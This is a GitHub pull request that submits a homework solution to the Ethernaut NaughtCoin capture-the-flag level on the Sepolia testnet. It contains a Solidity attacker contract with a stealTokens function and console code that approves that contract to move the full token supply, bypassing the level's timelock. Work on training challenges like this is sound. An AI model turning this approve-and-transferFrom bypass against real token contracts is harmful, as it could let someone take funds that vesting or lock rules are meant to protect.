Skip to content
This repository has been archived by the owner on Oct 29, 2023. It is now read-only.

hw 5 #20

Open
wants to merge 1 commit into
base: master
Choose a base branch
from
Open

hw 5 #20

wants to merge 1 commit into from

Conversation

thor4
Copy link

@thor4 thor4 commented May 26, 2023

Naughtcoin attacker contract

  • Specify instance address of Ethernaut Naughtcoin contract upon deployment
  • Use transferFrom() after approving token spend to attacker to get around timelock
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

interface INaughtCoin {
    function transferFrom(address sender, address recipient, uint256 amount) external returns (bool);
    function approve(address spender, uint256 amount) external returns (bool);
}

contract AttackerNaughtcoin {
    INaughtCoin public naughtCoin;

    constructor(INaughtCoin _naughtCoin) {
        naughtCoin = _naughtCoin;
    }

    function stealTokens(address _from, address _to, uint _value) public {
        naughtCoin.transferFrom(_from, _to, _value);
    }
}

Console code

  • Provides approval to attacker to send my tokens away
const attackerAddress = '0xDb1A9c1480255962d28aB4247b0DF4d47484A9E3'; 
const totalSupply = await contract.INITIAL_SUPPLY(); 
await contract.approve(attackerAddress, totalSupply);
  • instance: 0x7ca6DbF2B3a0303D6FadC7eB200c0414F184e9f9
  • attacker: 0xDb1A9c1480255962d28aB4247b0DF4d47484A9E3
  • network: Sepolia
  • wallet: 0xCBcE3bE28474c80415903947BC435265E2e5e61a

Sign up for free to subscribe to this conversation on GitHub. Already have an account? Sign in.
Reviewers
No reviews
Assignees
No one assigned
Labels
None yet
Projects
None yet
Milestone
No milestone
Development

Successfully merging this pull request may close these issues.
1 participant
@thor4